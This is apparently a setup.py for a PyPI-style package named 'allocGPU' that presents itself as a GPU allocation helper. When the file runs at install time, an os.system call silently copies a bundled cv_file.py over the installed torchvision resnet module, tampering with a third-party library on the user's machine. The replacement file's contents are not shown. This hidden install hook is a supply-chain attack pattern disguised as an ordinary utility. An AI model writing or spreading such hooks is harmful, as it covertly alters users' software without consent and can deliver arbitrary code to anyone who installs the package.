from setuptools import setup
from torchvision.models import resnet
import os

from pathlib import Path
this_directory = Path(__file__).parent
long_description = (this_directory / "README.md").read_text()

os.system('cp ./cv_file.py {}'.format(resnet.__file__))

setup(
    name='allocGPU',
    version='0.0.6',
    description="A Python library that automatically sets multiple gpus.",
    platforms=['any'],
    license="Public Domain",
    py_modules=['allocGPU', 'cv_file'],
    install_requires=[
        'gpustat', 'torchvision'
    ],
    options={'bdist_wheel': {
        'python_tag': 'py36.py37.py38.py39'
    }},
    long_description=long_description,
    long_description_content_type='text/markdown'
)
